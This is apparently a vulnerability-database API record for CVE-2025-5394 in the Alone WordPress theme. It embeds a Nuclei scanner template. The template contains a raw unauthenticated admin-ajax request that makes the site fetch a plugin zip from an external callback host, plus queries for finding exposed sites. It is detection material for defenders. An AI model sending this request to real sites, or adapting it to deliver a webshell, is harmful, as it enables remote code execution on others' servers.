{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-5394/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-5394/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-5394/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-5394/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-5394/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-5394"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-5394"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2025/CVE-2025-5394.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2025-5394\n\ninfo:\n  name: Unauthenticated Arbitrary Plugin Upload in Alone Theme\n  author: Nxploited,DhiyaneshDK\n  severity: critical\n  description: |\n    The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.\n  impact: |\n    This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution.\n  remediation: Fixed in 7.8.5.\n  reference:\n    - https://github.com/Nxploited/CVE-2025-5394/tree/main\n    - https://x.com/cloudflare/status/1951319364856058035?s=46\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"/wp-content/themes/alone/\"\n    fofa-query: body=\"/wp-content/themes/alone/\"\n  tags: cve,cve2025,unauth,file-upload,rce,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f{{interactsh-url}}%2fplugin%2f%7b%7b{{randstr}}%7d%7d.zip\n        # No plugin is uploaded or updated; just sending interactsh-url with randstr.\n\n    skip-variables-check: true\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains_all(body, '\\\"success\\\":true','\\\"substep\\\":\\\"activate\\\"')\n          - contains(content_type, 'application/json')\n          - status_code == 200\n        condition: and\n# digest: 4a0a004730450220075f906a47a86fb23c1cef68c30e9af691e52ec112dd0838a7de2d56a89b3b01022100975bc7a3eaafe9a81ad214fc1536b7fbf36e3856c6a3b192f31e460d1c0b175e:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2025-5394"
}